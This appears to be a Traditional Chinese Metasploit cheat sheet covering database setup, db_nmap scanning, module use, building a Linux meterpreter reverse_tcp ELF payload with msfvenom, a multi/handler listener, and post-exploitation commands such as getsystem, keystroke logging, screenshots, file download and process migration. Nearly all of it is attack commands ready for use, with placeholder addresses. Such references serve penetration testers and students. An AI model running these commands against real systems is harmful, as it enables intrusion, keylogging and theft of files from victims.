初始化 PostgreSQL 資料庫
1 2 3 4 5 6 7 8 9 10 11 12
|
msfdb init
msfdb start
msfdb stop
db_status
|
nmap 掃描
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27
| db_nmap --script-updatedb
db_nmap -sn [CIDR網段]
db_nmap [IP] -p-
db_nmap [IP] -p [端口] db_nmap [IP] -p [起始端口]-[結束端口] db_nmap [IP] -p [端口1],[端口2]
db_nmap -sV -p- [IP]
db_nmap [IP] -p [端口] -O
db_nmap -sV --script [漏洞script檔] [IP]
db_nmap [IP] -p [端口] -oN result.txt db_nmap [IP] -p [端口] -oX result.xml
|
模組操作
⭐ 更新可用模組
⭐ 顯示可用模組
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
| show exploits
show payloads
show auxiliary
show post
show encoders
show nops
|
⭐ 查找模組
⭐ 模組使用
1 2 3 4 5 6 7 8 9 10 11 12 13 14
| use [模組路徑]
info
set [參數名] [參數值]
show options
exploit
|
payload 基本操作
⭐ 接口介紹
接口 |
說明 |
command shell |
獲得一個命令行界面,允許攻擊者在目標系統上執行命令 |
meterpreter |
一種高級的、擴展性強的 payload,提供了豐富的功能,例如文件操作、過程管理、網絡偵查等 |
vnc |
在目標系統上開啟一個 VNC 服務器,允許攻擊者遠程查看和控制目標桌面 |
⭐ 創建 meterpreter payload :
1
| msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=[監聽機IP位置] LPORT=[監聽機端口] -f elf -o payload.elf
|
⭐ 啟動監聽服務,等待遠端執行 meterpreter payload
1 2 3 4 5
| use exploit/multi/handler set payload linux/x86/meterpreter/reverse_tcp set LHOST [監聽機IP位置] set LPORT [監聽機端口] exploit
|
⭐ 遠端執行 meterpreter payload
1 2 3 4
| chmod +x payload.elf
./payload.elf
|
後滲透操作(取得shell後)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39
| sessions -l
sessions -i [會話ID]
sysinfo
getuid
getsystem
shell
keyscan_start、keyscan_stop、keyscan_dump
screenshot
download [遠程文件路徑] [本地目標路徑] upload [本地文件路徑] [遠程目標路徑]
execute -f [可執行文件] -H
migrate -N [程式]
run packetrecorder、run arp_scanner
background
|